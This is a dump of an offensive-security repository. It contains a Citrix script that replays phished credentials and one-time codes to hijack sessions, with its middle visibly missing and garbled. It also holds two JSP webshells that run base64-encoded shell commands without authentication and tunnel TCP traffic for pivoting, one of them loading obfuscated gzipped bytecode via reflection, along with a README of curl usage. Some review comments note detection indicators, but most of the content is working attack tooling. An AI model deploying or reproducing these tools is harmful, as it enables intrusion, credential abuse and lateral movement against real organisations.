├── .gitmodules ├── Citrix ├── citrix_selenium.py └── requirements.txt ├── jsp-webshell-pivoting ├── README.md ├── jsp-pivotnacci.jsp └── jsp-regeorg.jsp └── unpriv-http-tcp80 ├── README.md ├── unpriv-http-tcp80-v0.3.cs └── unpriv-http-tcp80-v0.3.exe /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "SharpHound4Cobalt"] 2 | path = SharpHound4Cobalt 3 | url = https://github.com/Hypnoze57/SharpHound4Cobalt 4 | [submodule "POSTDump"] 5 | path = POSTDump 6 | url = https://github.com/YOLOP0wn/POSTDump 7 | [submodule "EchoDrv"] 8 | path = EchoDrv 9 | url = https://github.com/YOLOP0wn/EchoDrv 10 | [submodule "CheckDrivers"] 11 | path = CheckDrivers 12 | url = https://github.com/YOLOP0wn/CheckDrivers 13 | [submodule "dark-doh"] 14 | path = dark-doh 15 | url = https://github.com/darksh3llRU/dark-doh 16 | -------------------------------------------------------------------------------- /Citrix/citrix_selenium.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | ''' 4 | Author: POST Cyberforce - COS (Offensive Security Team) 5 | 6 | Usage: 7 | python3 citrix_selenium.py https://citrix.domain.com/ UserName Rand0mPwd123 123456 8 | 9 | Description: 10 | This script is used to replay Citrix credentials + OTP gathered during a phishing attack on the real targeted Citrix host. 11 | - The requests library automatically grabs the authenticated cookie and passes it to Selenium 12 | - Selenium automatically loads the cookie into the browser and connects to Citrix using a new Thread in order to be able to open several detached sessions at a time 13 | - Selenium automatically refreshes the cookie by refreshing the page every 15 sec.
14 |
15 | Note:
16 | - Use your own way to pass the phished credentials to this script
17 | - You can disable the Selenium function if you want to use the session cookie by yourself or run the script in full headless mode
18 | - Use the chromedriver version according to your Chrome version
19 | '''
20 |
21 | from termcolor import colored
22 | import sys, time
23 | import requests
24 | import urllib3
25 | from threading import Thread
26 | from selenium_stealth import stealth
27 | from selenium import webdriver
28 | from selenium.webdriver.common.by import By
29 | from selenium.webdriver.support.ui import WebDriverWait, Select
30 | from selenium.webdriver.chrome.options import Options
31 | from selenium.webdriver.support import expected_conditions as ec
32 | from selenium.common.exceptions import NoSuchElementException
33 |
# Silences urllib3's InsecureRequestWarning. The requests.post() call further
# down passes verify=False, so the server certificate is not validated.
34 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
35 |
# User-Agent sent by the requests-based step (a Chrome/74 string).
# NOTE(review): the browser options below set a different User-Agent
# (Chrome/91). If the same session cookie is then presented by both clients,
# as the module docstring describes, the change of User-Agent within one
# session is something server-side session monitoring can alert on.
36 | HEADERS = {
37 |     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'
38 | }
39 |
# Chrome options for the Selenium step: maximised window, the
# "enable-automation" switch excluded and the automation extension disabled,
# "detach" so the browser stays open after the driver process ends, a fixed
# User-Agent, reduced log output, and an incognito profile.
# The code that creates the driver with these options is not visible in this
# listing.
40 | ch_options = Options()
41 | ch_options.add_argument("start-maximized")
42 | ch_options.add_experimental_option("excludeSwitches", ["enable-automation"])
43 | ch_options.add_experimental_option('useAutomationExtension', False)
44 | ch_options.add_experimental_option("detach", True)
45 | ch_options.add_argument('--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36')
46 | ch_options.add_argument("--log-level=3")
47 | ch_options.add_argument("incognito")
48 |
# NOTE(review): the listing is damaged from here on. The text between source
# lines 56 and 180 is missing, so the function below and the start of the
# script's entry point are incomplete as shown and are left untouched.
49 | def get_state_context(host):
50 |     uri = 'nf/auth/getAuthenticationRequirements.do'
51 |     url = '%s%s' % (host, uri)
52 |
53 |     r = requests.post(url, headers=HEADERS, verify=False)
54 |     st_ctx = None
55 |     try:
56 |         st_ctx = r.text.split('StateContext')[1].replace(' >', '').replace('', '').replace(' " % (sys.argv[0]))
180 |     print("Example: %s https://citrix.domain.com/
UserName Rand0mPwd123* 123456)" % (sys.argv[0])) 181 | quit() 182 | 183 | host = sys.argv[1] 184 | usr = sys.argv[2] 185 | pwd = sys.argv[3] 186 | otp = sys.argv[4] 187 | threads = [] 188 | 189 | if not host.endswith('/'): 190 | host += '/' 191 | 192 | nsc_cookie = autologin(host, usr, pwd, otp)[1] 193 | if nsc_cookie: 194 | t = Thread(target=selenium_login(nsc_cookie)) 195 | t.start() 196 | threads.append(t) 197 | -------------------------------------------------------------------------------- /Citrix/requirements.txt: -------------------------------------------------------------------------------- 1 | selenium_stealth 2 | requests 3 | selenium 4 | urllib3 5 | termcolor 6 | -------------------------------------------------------------------------------- /jsp-webshell-pivoting/README.md: -------------------------------------------------------------------------------- 1 | !!! Disclaimer !!! 2 | 3 | - The authors do not have any responsibility and/or liability for how you will use this information and the source code! 4 | - Everything that anyone can find in this repository is only for educational and research purposes, and the authors have no responsibility for how you will use the data found. 
5 | 6 | JSP webshell with pivoting via Neo-reGeorg or Pivotnacci 7 | 8 | 1) Command exec via GET or POST 9 | 10 | command(s) should be encoded in base64 (GET or POST) to support control operators, ex: id && ls -lah / 11 | 12 | - curl -s 'http://127.0.0.1:8080/jsp-regeorg.jsp?uuid=form&darkCMD=aWQgJiYgbHMgLWxhaCAvCg==' 13 | - curl -s -X POST -d 'uuid=form&darkCMD=aWQgJiYgbHMgLWxhaCAvCg==' -H 'Content-Type: application/x-www-form-urlencoded' 'http://127.0.0.1:8080/jsp-regeorg.jsp' 14 | - curl -s 'http://127.0.0.1:8080/jsp-pivotnacci.jsp?uuid=form&darkCMD=aWQgJiYgbHMgLWxhaCAvCg==' 15 | - curl -s -X POST -d 'uuid=form&darkCMD=aWQgJiYgbHMgLWxhaCAvCg==' -H 'Content-Type: application/x-www-form-urlencoded' 'http://127.0.0.1:8080/jsp-pivotnacci.jsp' 16 | 17 | 18 | 2.a) Pivoting usage Neo-reGeorg -> jsp-regeorg.jsp 19 | 20 | pivoting using Neo-reGeorg (5.0.1), for other versions you have to update the relevant parts in the jsp file 21 | 22 | - python neoreg.py -u 'http://127.0.0.1:8080/jsp-regeorg.jsp?uuid=test' -k PASSWORD -vvvvvvvv 23 | 24 | 2.b) Pivoting usage Pivotnacci -> jsp-pivotnacci.jsp 25 | 26 | pivoting using pivotnacci (0.0.2), for other versions you have to update the relevant parts in the jsp file 27 | 28 | - pivotnacci http://127.0.0.1:8080/jsp-pivotnacci.jsp --password PASSWORD -vvvv 29 | -------------------------------------------------------------------------------- /jsp-webshell-pivoting/jsp-pivotnacci.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*, 2 | java.util.* 3 | " trimDirectiveWhitespaces="true"%> 4 | <%@page contentType="text/html;charset=UTF-8"%> 5 | <%@page pageEncoding="UTF-8"%> 6 | 7 | <%! 
8 | final String APP_NAME="jsp webshell v0.3 - Pivotnacci version";
9 | %>
10 |
11 | <%-- --------------------------------pivotnacci part-------------------------------- --%>
12 | <%@page import="javax.servlet.http.HttpServletRequest,
13 | javax.servlet.http.HttpServletResponse,
14 | javax.servlet.http.HttpSession,
15 | java.nio.ByteBuffer,
16 | java.net.InetSocketAddress,
17 | java.net.InetAddress,
18 | java.net.Socket,
19 | java.net.UnknownHostException,
20 | java.nio.channels.SocketChannel,
21 | java.util.Arrays,
22 | java.util.Random,
23 | java.io.IOException
24 | " trimDirectiveWhitespaces="true"
25 | %>
26 | <%!
27 |
     /**
      * Server-side half of a TCP relay carried over HTTP (the page labels this
      * section "pivotnacci part").
      *
      * Each request names an operation in the X-OPERATION header. CONNECT opens
      * an outbound SocketChannel to the host and port given in X-IP / X-PORT and
      * keeps it in the HTTP session; RECV and SEND move bytes between the HTTP
      * bodies and that channel; DISCONNECT closes it. Results are reported in
      * the X-STATUS and X-ERROR response headers.
      *
      * Review notes (detection): every header name and status value below is a
      * fixed string, so they can be matched in proxy or web-server logs that
      * record request/response headers. Requests that fail the checks in
      * handle() receive the body "Server Error 500 (Internal Error)"; this class
      * never sets an HTTP status code itself, so the body text and the status
      * line may disagree. The destination of CONNECT comes straight from request
      * headers, which means the application server process opens outbound
      * connections it would not normally make.
      */
28 | public class Handler {
29 |
         // Body returned by handle_check() when a request is not accepted.
30 |     private final String ACK_MESSAGE = "Server Error 500 (Internal Error)";
         // Shared secret compared with the X-PASSWORD request header; "PASSWORD" is the value shipped in this listing.
31 |     private final String AGENT_PASSWORD = "PASSWORD";
32 |
         // Request/response header names used by the protocol.
33 |     private final String OPERATION_HEADER = "X-OPERATION";
34 |     private final String IP_HEADER = "X-IP";
35 |     private final String PORT_HEADER = "X-PORT";
36 |     private final String ID_HEADER = "X-ID";
37 |     private final String SVC_HEADER = "X-SVC";
38 |     private final String STATUS_HEADER = "X-STATUS";
39 |     private final String ERROR_MESSAGE_HEADER = "X-ERROR";
40 |     private final String PASSWORD_HEADER = "X-PASSWORD";
41 |
         // Values written to the X-STATUS response header.
42 |     private final String OK_STATUS = "OK";
43 |     private final String FAIL_STATUS = "FAIL";
44 |     private final String INCORRECT_STATUS = "INCORRECT";
45 |
         // Operation names accepted in X-OPERATION.
46 |     private final String CONNECT_OPERATION = "CONNECT";
47 |     private final String RECV_OPERATION = "RECV";
48 |     private final String SEND_OPERATION = "SEND";
49 |     private final String DISCONNECT_OPERATION = "DISCONNECT";
50 |
         // Prefix of the session attribute under which each channel is stored (prefix + id).
51 |     private final String SOCKET_SESSION_KEY = "socket";
52 |
53 |     private HttpServletRequest request;
54 |     private HttpServletResponse response;
55 |     private HttpSession session;
56 |
         // Note the argument order: response first, then request, then session.
57 |     public Handler(
58 |         HttpServletResponse response,
59 |         HttpServletRequest request,
60 |         HttpSession session) {
61 |         this.response = response;
62 |         this.request = request;
63 |         this.session = session;
64 |     }
65 |
         // Entry point. A request without X-OPERATION, or whose X-PASSWORD differs
         // from AGENT_PASSWORD, gets the ACK_MESSAGE body; anything else is
         // dispatched by handle_post().
         // NOTE(review): get_header() returns null when X-PASSWORD is absent, and
         // compareTo(null) throws NullPointerException, which nothing here catches.
66 |     public void handle() {
67 |         String cmd = this.get_header(this.OPERATION_HEADER);
68 |         if (cmd == null) {
69 |             this.handle_check();
70 |             return;
71 |         }
72 |
73 |         String password = this.get_header(this.PASSWORD_HEADER);
74 |         if (this.AGENT_PASSWORD.compareTo(password) != 0) {
75 |             this.handle_check();
76 |             return;
77 |         }
78 |
79 |         this.handle_post(cmd);
80 |     }
81 |
         // Writes ACK_MESSAGE to the response body; an IOException is silently dropped.
82 |     private void handle_check() {
83 |         try {
84 |             this.response.getWriter().print(this.ACK_MESSAGE);
85 |         } catch (IOException e) {}
86 |     }
87 |
         // Dispatches on the operation name. CONNECT is handled first and does not
         // go through is_this_an_adequate_agent(); RECV, SEND and DISCONNECT do,
         // and get X-STATUS: INCORRECT when that check fails. An unrecognised
         // operation falls through without setting any status header. Any
         // exception is reported as X-STATUS: FAIL with its message in X-ERROR.
88 |     private void handle_post(String cmd) {
89 |         try {
90 |             if (cmd.compareTo(this.CONNECT_OPERATION) == 0) {
91 |                 String addr = request.getHeader(this.IP_HEADER);
92 |                 int port = Integer.parseInt(request.getHeader(this.PORT_HEADER));
93 |                 this.handle_connect(addr, port);
94 |                 return;
95 |             }
96 |
97 |             if (!this.is_this_an_adequate_agent()){
98 |                 this.set_incorrect_status();
99 |                 return;
100 |             }
101 |
102 |             String socket_id = request.getHeader(this.ID_HEADER);
103 |
104 |             if(cmd.compareTo(this.RECV_OPERATION) == 0) {
105 |                 this.handle_recv(socket_id);
106 |             }
107 |             else if (cmd.compareTo(this.SEND_OPERATION) == 0) {
108 |                 this.handle_send(socket_id);
109 |             }
110 |             else if (cmd.compareTo(this.DISCONNECT_OPERATION) == 0) {
111 |                 this.handle_disconnect(socket_id);
112 |             }
113 |         } catch (Exception e) {
114 |             this.set_fail_status(e.getMessage());
115 |         }
116 |     }
117 |
          // Opens the outbound channel, stores it in the session under a new id, and
          // returns that id in X-ID together with this host's name in X-SVC.
118 |     private void handle_connect(String addr, int port) throws IOException {
119 |         SocketChannel socket = this.connect_with_host(addr, port);
120 |         String socket_id = this.generate_id();
121 |
122 |         this.set_socket(socket_id, socket);
123 |         this.set_ok_status();
124 |         this.response.setHeader(this.SVC_HEADER, this.get_hostname());
125 |         this.response.setHeader(this.ID_HEADER, socket_id);
126 |     }
127 |
          // Connects while the channel is still blocking, then switches it to
          // non-blocking mode for the later read and write calls.
128 |     private SocketChannel connect_with_host(String addr, int port) throws IOException {
129 |         SocketChannel socketChannel = SocketChannel.open();
130 |         socketChannel.connect(new InetSocketAddress(addr, port));
131 |         socketChannel.configureBlocking(false);
132 |         return socketChannel;
133 |     }
134 |
          // Reads from the stored channel in 512-byte buffers and streams each chunk
          // into the response body as application/octet-stream, stopping when a read
          // returns 0 or -1. A first read of -1 is reported as FAIL "Read failed".
135 |     private void handle_recv(String socket_id) throws IOException {
136 |         SocketChannel socketChannel = this.get_socket(socket_id);
137 |
138 |         ByteBuffer buf = ByteBuffer.allocate(512);
139 |         int bytesRead = socketChannel.read(buf);
140 |         if (bytesRead == -1) {
141 |             set_fail_status("Read failed");
142 |             return;
143 |         }
144 |
145 |         this.response.setContentType("application/octet-stream");
146 |         this.set_ok_status();
147 |
148 |         ServletOutputStream so = this.response.getOutputStream();
149 |         while (bytesRead > 0){
150 |             so.write(buf.array(),0,bytesRead);
151 |             so.flush();
152 |             buf = ByteBuffer.allocate(512);
153 |             bytesRead = socketChannel.read(buf);
154 |         }
155 |
156 |         so.flush();
157 |         so.close();
158 |     }
159 |
          // Copies the request body to the stored channel. The buffer size comes
          // from the request's Content-Length; a write that returns 0 is reported as
          // FAIL "Write failed".
160 |     private void handle_send(String socket_id) throws IOException {
161 |         SocketChannel socketChannel = this.get_socket(socket_id);
162 |         int readlen = this.request.getContentLength();
163 |         byte[] buff = new byte[readlen];
164 |
165 |         this.request.getInputStream().read(buff, 0, readlen);
166 |         ByteBuffer buf = ByteBuffer.allocate(readlen);
167 |         buf.put(buff);
168 |         buf.flip();
169 |
170 |         while(buf.hasRemaining()) {
171 |             int nbytes = socketChannel.write(buf);
172 |             if (nbytes == 0) {
173 |                 this.set_fail_status("Write failed");
174 |                 return;
175 |             }
176 |         }
177 |         this.set_ok_status();
178 |     }
179 |
          // Closes the underlying socket and reports OK or FAIL; the session
          // attribute is removed in either case.
180 |     private void handle_disconnect(String socket_id) {
181 |         SocketChannel socketChannel = this.get_socket(socket_id);
182 |         try {
183 |             socketChannel.socket().close();
184 |             set_ok_status();
185 |         } catch (Exception e) {
186 |             set_fail_status(e.getMessage());
187 |         }
188 |         this.remove_socket(socket_id);
189 |     }
190 |
          // True when the X-SVC request header equals this machine's host name, the
          // value handed out by handle_connect(). Presumably this lets a client
          // notice that a request reached a different node than the one holding its
          // channel - TODO confirm against the client.
191 |     private boolean is_this_an_adequate_agent() throws UnknownHostException {
192 |         return this.get_svc().compareTo(this.get_hostname()) == 0;
193 |     }
194 |
195 |     private void set_ok_status() {
196 |         this.set_header(this.STATUS_HEADER, this.OK_STATUS);
197 |     }
198 |
199 |     private void set_incorrect_status() {
200 |         this.set_header(this.STATUS_HEADER, this.INCORRECT_STATUS);
201 |     }
202 |
          // Sets X-STATUS: FAIL and copies msg (typically an exception message) into X-ERROR.
203 |     private void set_fail_status(String msg) {
204 |         this.set_header(this.STATUS_HEADER, this.FAIL_STATUS);
205 |         this.set_header(this.ERROR_MESSAGE_HEADER, msg);
206 |     }
207 |
          // Host name of the local machine; handle_connect() returns it to the client in X-SVC.
208 |     private String get_hostname() throws UnknownHostException {
209 |         return InetAddress.getLocalHost().getHostName();
210 |     }
211 |
          // Session lookup by "socket" + id; null when no such attribute exists.
212 |     private SocketChannel get_socket(String id) {
213 |         return (SocketChannel)this.get_attribute(this.SOCKET_SESSION_KEY + id);
214 |     }
215 |
216 |     private void set_socket(String id, SocketChannel socket) {
217 |         this.set_attribute(this.SOCKET_SESSION_KEY + id, socket);
218 |     }
219 |
220 |     private void remove_socket(String id) {
221 |         this.session.removeAttribute(this.SOCKET_SESSION_KEY + id);
222 |     }
223 |
224 |     private Object get_attribute(String name) {
225 |         return this.session.getAttribute(name);
226 |     }
227 |
228 |     private void set_attribute(String name, Object value) {
229 |         this.session.setAttribute(name, value);
230 |     }
231 |
          // Not called anywhere in this class; handle() reads the header directly.
232 |     private String get_command() {
233 |         return this.get_header(this.OPERATION_HEADER);
234 |     }
235 |
          // X-SVC request header, with a missing header mapped to the empty string.
236 |     private String get_svc() {
237 |         String svc = this.get_header(this.SVC_HEADER);
238 |         if (svc == null) {
239 |             svc = "";
240 |         }
241 |
242 |         return svc;
243 |     }
244 |
245 |     private String get_header(String name) {
246 |         return this.request.getHeader(name);
247 |     }
248 |
249 |     private void set_header(String name, String value) {
250 |         this.response.setHeader(name,value);
251 |     }
252 |
          // Channel ids are java.util.Random.nextInt() values rendered as decimal text.
253 |     private String generate_id() {
254 |         Random random = new Random();
255 |         return Integer.toString(random.nextInt());
256 |     }
257 |
258 | }
259 |
260 | %>
261 | <%-- --------------------------------pivotnacci part END---------------------------- --%>
262 |
263 | <%-- -------------------------------------------------------------------------------
--%>
264 | <%
265 | final String URL=request.getRequestURI();
266 | final String LPWD=application.getRealPath("/");
267 |
268 | String param = request.getParameter("uuid");
269 |
      // Command-execution branch, taken when the "uuid" request parameter equals
      // "form" (case-insensitive). No X-PASSWORD or other credential is checked
      // on this branch; only the else-branch below goes through Handler.handle().
      // Review notes (detection): the indicators visible here are the request
      // parameters uuid=form and darkCMD (query string or form body, per the
      // README examples) and the servlet container process starting /bin/sh -c.
      // NOTE(review): the string literals in this scriptlet are split across
      // lines in this listing; presumably an HTML tag inside each of them was
      // lost when the page was rendered. They are reproduced as shown.
270 | if ( (param != null) && (!param.trim().isEmpty()) && (param.equalsIgnoreCase("form")) ) {
271 |
          // Writes the web application's real filesystem path into the response.
272 |     out.println("LPWD: " + application.getRealPath("/") + "
");
273 |
          // darkCMD is Base64-decoded and used as the command string.
274 |     String enc_command = request.getParameter("darkCMD");
275 |     byte[] dec_bytes = Base64.getDecoder().decode(enc_command);
276 |     String command = new String(dec_bytes);
277 |
278 |     String output = "";
279 |     //String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows
280 |     String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // UNIX
281 |     String[] comm = new String[3];
282 |     comm[0] = COMMAND_INTERPRETER[0];
283 |     comm[1] = COMMAND_INTERPRETER[1];
284 |     comm[2] = command;
285 |
          // command comes from new String(...), so it is never null here. Only the
          // process's standard output is read back; an IOException is printed with
          // printStackTrace() and otherwise ignored.
286 |     if(command != null) {
287 |         String s = null;
288 |         try {
289 |             Process p = Runtime.getRuntime().exec(comm,null,null);
290 |             BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
291 |             while((s = sI.readLine()) != null) { output += s+"
"; }
292 |         }
293 |         catch(IOException e) {
294 |             e.printStackTrace();
295 |         }
296 |     }
          // The decoded command and its output are written to the response as-is.
297 |     out.println("Executed command: " + command + "
");
298 |     out.println("Command output:" + "
");
299 |     out.println(output);
300 |
301 | }
302 | // PIVOTING THINGS - Pivotnacci
303 | else{
304 |     Handler handler = new Handler(response, request, session);
305 |     handler.handle();
306 | }
307 |
308 | %>
309 | <%-- ------------------------------------------------------------------------------- --%>
310 |
311 |
--------------------------------------------------------------------------------
/jsp-webshell-pivoting/jsp-regeorg.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.io.*,
2 | java.util.*
3 | " trimDirectiveWhitespaces="true"%>
4 | <%@page contentType="text/html;charset=UTF-8"%>
5 | <%@page pageEncoding="UTF-8"%>
6 |
7 | <%!
8 | final String APP_NAME="jsp webshell v0.3 - Neo-reGeorg version";
9 | %>
10 |
11 | <%-- --------------------------------Neo-regeorg part-------------------------------- --%>
12 | <%!
     // Static map, so it is shared by every request handled by this page; the
     // scriptlet further down looks up an entry keyed by its character table.
13 | public static java.util.Map namespace = new java.util.HashMap();
14 |
     // Inflates a gzip-compressed byte array fully into memory, 256 bytes at a
     // time, and returns the result. None of the streams is closed explicitly.
15 | public static byte[] unGzip(byte[] bytes) throws Exception{
16 |     java.io.ByteArrayOutputStream out = new java.io.ByteArrayOutputStream();
17 |     java.io.ByteArrayInputStream in = new java.io.ByteArrayInputStream(bytes);
18 |     java.util.zip.GZIPInputStream ungzip = new java.util.zip.GZIPInputStream(in);
19 |     byte[] buffer = new byte[256];
20 |     int n;
21 |     while ((n = ungzip.read(buffer)) >= 0)
22 |         out.write(buffer, 0, n);
23 |     return out.toByteArray();
24 | }
25 |
     // Defines a class from raw bytecode at run time: creates a URLClassLoader
     // with no URLs whose parent is the thread context class loader, then calls
     // ClassLoader's three-argument (byte[], int, int) method through reflection
     // after setAccessible(true).
     // Review notes (detection): the method name is given as a byte array that
     // decodes to "defineClass", so a plain text search for that name does not
     // match this file. Rules are better keyed on the pattern itself:
     // getDeclaredMethod on ClassLoader.class followed by setAccessible(true),
     // next to a large inline byte array.
26 | public static Class loader(byte[] bytes) throws Exception {
27 |     java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[0], Thread.currentThread().getContextClassLoader());
28 |     java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(new String(new byte[]{100,101,102,105,110,101,67,108,97,115,115}), new Class[]{byte[].class, int.class, int.class});
29 |     method.setAccessible(true);
30 |     Class clazz = (Class) method.invoke(classLoader, new Object[]{bytes, new Integer(0), new Integer(bytes.length)});
31 |     return
clazz; 32 | } 33 | %> 34 | 35 | <%-- --------------------------------Neo-regeorg part END---------------------------- --%> 36 | 37 | <%-- ------------------------------------------------------------------------------- --%> 38 | <% 39 | final String URL=request.getRequestURI(); 40 | final String LPWD=application.getRealPath("/"); 41 | 42 | String param = request.getParameter("uuid"); 43 | 44 | if ( (param != null) && (!param.trim().isEmpty()) && (param.equalsIgnoreCase("form")) ) { 45 | 46 | out.println("LPWD: " + application.getRealPath("/") + "
"); 47 | 48 | String enc_command = request.getParameter("darkCMD"); 49 | byte[] dec_bytes = Base64.getDecoder().decode(enc_command); 50 | String command = new String(dec_bytes); 51 | 52 | String output = ""; 53 | //String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows 54 | String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // UNIX 55 | String[] comm = new String[3]; 56 | comm[0] = COMMAND_INTERPRETER[0]; 57 | comm[1] = COMMAND_INTERPRETER[1]; 58 | comm[2] = command; 59 | 60 | if(command != null) { 61 | String s = null; 62 | try { 63 | Process p = Runtime.getRuntime().exec(comm,null,null); 64 | BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); 65 | while((s = sI.readLine()) != null) { output += s+"
"; } 66 | } 67 | catch(IOException e) { 68 | e.printStackTrace(); 69 | } 70 | } 71 | out.println("Executed command: " + command + "
"); 72 | out.println("Command output:" + "
"); 73 | out.println(output); 74 | 75 | } 76 | // PIVOTING THINGS - Neo-reGeorg 77 | else{ 78 | String charslist = "OVcdQN+Gp2kISrx9PhwJKsv4qbFT/gao8zeRify1LuAltY7UE65XmH3jBMWD0nCZ"; 79 | Object[] args = new Object[]{ 80 | request, //0 81 | response, //1 82 | charslist.toCharArray(), //2 83 | new byte[]{-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,6,-1,-1,-1,28,60,39,9,54,23,50,49,46,32,15,-1,-1,-1,-1,-1,-1,-1,42,56,62,59,48,26,7,53,11,19,20,40,57,5,0,16,4,35,12,27,47,1,58,51,45,63,-1,-1,-1,-1,-1,-1,30,25,2,3,34,37,29,17,36,55,10,43,52,61,31,8,24,13,21,44,41,22,18,14,38,33,-1,-1,-1,-1,-1},//3 84 | new Integer(200),//4 85 | new Integer(513),//5 86 | new Integer(524288),//6 87 | "9cQYIwVSgdgRh1sK/jQBsHilPXfir3L5sjsdPeYegmfFSy6UT+BXvdg5q3B5KQt5PX2KgmgPhenlJHbIwyh9Svz3g5OYIJB=",//7 88 | new Integer(1868317161),//8 89 | }; 90 | 91 | 92 | if(namespace.get(charslist) == null){ 93 | byte[] clazzBytes = unGzip(new 
byte[]{31,-117,8,0,-112,-81,-77,99,0,3,-99,57,9,120,27,-43,-47,51,-46,-82,118,37,-81,19,89,-74,28,-81,-81,-112,112,41,-78,-116,33,33,2,-28,36,-112,56,14,49,-79,29,-80,76,-116,-95,64,20,121,109,43,-111,37,35,-55,57,40,77,-95,-123,82,-82,2,-67,-88,67,33,16,-46,-86,-108,-108,35,-128,-30,96,98,-62,21,90,-54,-39,-46,-106,66,91,122,23,-24,1,-91,20,122,-30,127,102,119,37,75,-74,-62,-97,-1,-1,62,-21,29,-13,-26,-51,-101,-21,-51,-52,91,63,-5,-47,35,19,0,112,-110,69,114,64,9,-68,46,-63,-49,36,-72,-49,14,-9,-64,-49,37,120,-128,-5,95,72,-16,-122,3,36,-8,-91,4,-65,-110,-31,-41,18,-4,-58,65,-48,-33,74,-16,59,25,126,47,-61,31,100,120,83,-126,-73,28,80,6,111,115,-13,71,9,-2,-28,-128,10,120,-99,-101,63,59,-64,14,127,-31,-47,59,-68,-23,93,-90,-13,87,30,-67,39,-63,-33,28,80,10,-17,115,-13,119,110,62,-112,-31,67,-58,-2,7,47,-1,83,-122,127,-55,-16,111,9,-2,-29,-128,99,-31,-65,-36,124,36,-63,-92,3,60,8,-36,-96,-124,22,7,-36,-126,86,7,52,-96,32,-93,-24,64,27,74,18,-54,-36,-37,-71,113,-16,74,-119,-116,-118,-124,-91,14,-100,-123,-77,-71,113,-106,96,25,-70,74,-80,28,43,-72,113,-53,88,73,-89,-31,28,38,89,-59,-115,-54,-45,106,110,106,-120,23,-84,117,96,29,-42,83,67,44,82,-13,1,-93,-52,45,-63,-93,112,94,9,-50,71,-105,-116,71,51,-42,49,50,30,-53,43,-57,-55,120,60,-9,30,110,22,112,-29,-107,-79,65,66,-97,3,-50,33,117,96,35,-98,64,35,108,-30,-23,59,50,-98,-56,123,79,34,-115,-32,66,30,45,-110,-15,100,25,23,-13,-36,-17,-128,-115,120,10,55,-89,74,120,-102,3,46,-58,-128,3,-101,113,9,67,-106,-110,73,112,25,-13,112,-70,-116,103,-56,-72,-36,1,-75,76,109,5,-125,90,36,92,73,-104,-16,1,79,90,101,92,-27,-64,51,113,53,111,107,-29,-47,89,14,92,-125,-19,-52,67,-121,-116,-99,12,89,-53,-51,-39,-36,-100,-61,88,93,18,6,29,-80,-107,109,-73,21,-69,101,60,-105,-5,117,50,-10,48,-16,29,-34,120,30,55,-67,50,-98,-49,44,95,-64,-51,39,-72,-71,-112,-101,-117,-56,76,120,-79,3,-82,-59,-11,37,-80,24,67,-36,108,-112,48,-52,-112,62,9,53,9,-5,29,112,61,14,48,-18,-96,-124,17,7,-36,-60,-66,113,19,110,-28,102,19,107,61,-54,-51,16,55,49
,9,-29,-28,-112,56,-52,102,-66,-60,78,90,73,72,-104,-76,-61,-83,-36,-89,-20,112,27,38,24,109,-124,-105,55,59,112,11,110,-27,102,27,55,-105,74,-8,73,7,-20,102,41,118,-29,101,-36,124,74,-62,-19,18,126,-38,1,119,-109,-125,-29,-27,18,94,33,-31,103,16,44,90,-116,-102,11,90,-88,-23,-45,120,-76,2,65,78,106,-55,100,36,30,75,34,-52,110,-33,24,-38,28,106,26,73,69,-94,77,29,-95,-31,102,4,123,48,50,16,11,-91,70,18,-124,-67,-72,112,117,-119,49,-115,-122,98,3,77,-63,84,34,18,27,104,-50,-125,-84,-35,-80,81,11,-89,-102,-105,17,13,-37,-110,72,44,-110,90,-122,96,-11,44,88,-121,32,-76,-60,-7,108,-101,118,-55,72,40,74,-121,-70,61,51,-73,45,56,31,65,-36,-32,63,-103,-39,-83,-12,92,-80,98,-63,-52,-77,12,4,-90,84,-23,-103,-71,-70,-128,37,-77,15,106,-95,62,45,-79,73,-37,-122,112,92,49,-92,98,84,29,-83,91,-61,-38,112,-54,80,-120,20,73,70,-29,-31,80,116,26,-105,-39,-3,-60,-91,99,67,116,-13,-59,125,90,88,-105,-55,75,-84,-26,-95,-75,-59,82,-38,-128,-106,32,102,102,74,104,-18,-44,98,-71,-99,51,113,-118,-110,34,-71,-108,72,108,115,124,-109,-42,-95,-91,6,-29,125,8,107,-118,40,112,38,-77,69,-24,47,40,-58,86,105,62,-15,-123,8,23,-2,-97,-87,-73,68,67,-55,-28,17,-97,103,79,-124,98,125,43,-74,-91,52,82,-73,-51,-45,-42,-90,75,-24,-40,-64,-128,-18,56,-119,77,118,102,7,104,35,96,36,-106,-22,-114,-101,-88,-94,-57,-64,-76,109,-42,18,-111,126,50,112,83,17,3,-23,-112,-83,77,49,45,-43,-108,76,70,-101,-126,-63,-10,-96,-31,-21,-70,-23,92,-31,65,45,-68,-87,37,26,-47,-120,110,98,36,-103,-46,72,-103,-127,-84,33,-110,90,120,36,17,73,109,107,10,107,-119,84,-45,121,-117,79,60,-83,-123,6,-111,-2,72,56,-108,-46,-118,104,96,-63,58,9,63,-101,37,26,-44,18,-60,87,-114,-88,107,64,75,45,15,-77,91,105,125,109,-55,-28,-120,-106,32,9,-114,-9,44,56,-94,-93,-24,-122,46,9,71,-11,43,-92,64,6,-10,33,-108,23,-47,-83,2,-9,-62,125,10,-36,15,15,32,-108,-51,-16,27,5,-81,-60,-85,16,-100,-45,-71,38,-11,19,107,61,116,-72,-106,40,88,54,-88,42,-16,93,-8,30,-62,44,29,30,-119,55,-27,16,105,83,75,-100,72